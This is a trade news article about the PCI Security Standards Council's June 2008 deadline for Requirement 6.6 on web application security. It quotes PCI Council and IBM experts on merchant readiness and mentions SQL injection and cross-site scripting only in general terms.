A PCI Deadline Approaches for Internet Application Security

Yet another important security deadline is at hand. On Monday, the PCI Security Standards Council, the independent body that administers the Payment Card Industry data-security standard, will make mandatory protection measures in its rules about Internet-facing software applications that the Council currently classifies as best practices. While the PCI rules apply to all entities that touch payment card data, including issuers, processors, and merchants, security experts are paying especially close attention to what merchants?the source of most publicly known breaches of card data?are doing or not doing to meet the new mandates. Two experts contacted by Digital Transactions News did not have data about how many merchants will be compliant come June 30, but they're keeping their fingers crossed. “I do anticipate that for many of the merchants, some of these controls are in or close to in place,” says Troy Leach, technical director at the Wakefield, Mass.-based PCI Council. “We think the adoption is going to be fairly easy for merchants.” Kristin Lovejoy, director of governance and risk-management strategy at Armonk, N.Y.-based International Business Machines Corp., predicts most of the large merchants IBM advises about card security will meet the new mandates. But, as with earlier deadlines, many companies, mostly mid-sized and smaller ones, have put off action until the last minute even though the June 2008 deadline was disclosed with the release of PCI's version 1.1 in September 2006. “We're hearing a lot of, 'uh oh, we've got to do something and we've got to do it today,'” says Lovejoy, who works out of Washington, D.C. The major card networks are responsible for enforcement, and they've said little publicly about the coming change. The new requirements involve a brief?65 words?part of the PCI rules called Requirement 6.6. The section says all Internet-facing applications should be protected against known attacks by having custom-made software tested for common vulnerabilities by a security specialist, or by installing an application-layer firewall. The preceding section of the rules lists a number of common software soft spots. Some of the most serious attacks that exploit those vulnerabilities are so-called injection attacks such as structured query language (SQL) injection, and cross-site scripting (XSS) attacks. Very generally, an SQL injection can give a hacker access to a Web-facing database, while a successful XSS attack bypasses an application's access controls, enabling crimes such as phishing or the capture of card data from online shopping carts. “With those type of vulnerabilities?they're very easy to populate over a large amount of computers,” says Leach. Based on the many questions it received at a PCI meeting last year, the PCI Council in April issued a white paper clarifying Requirement 6.6. The paper suggested a number of ways to find vulnerabilities, including through manual and automated reviews. Lovejoy says spending by IBM's clients to find and correct their applications' vulnerabilities “is all over the map.” Merchants with the biggest jobs are those that have outsourced most of their application development and don't have a good picture of their software programs' security aspects regarding payments, she adds. Meanwhile, the PCI Council is starting a program to enhance the uniformity of PCI assessments, and is considering augmenting the training of its so-called Qualified Security Assessors, according to Leach.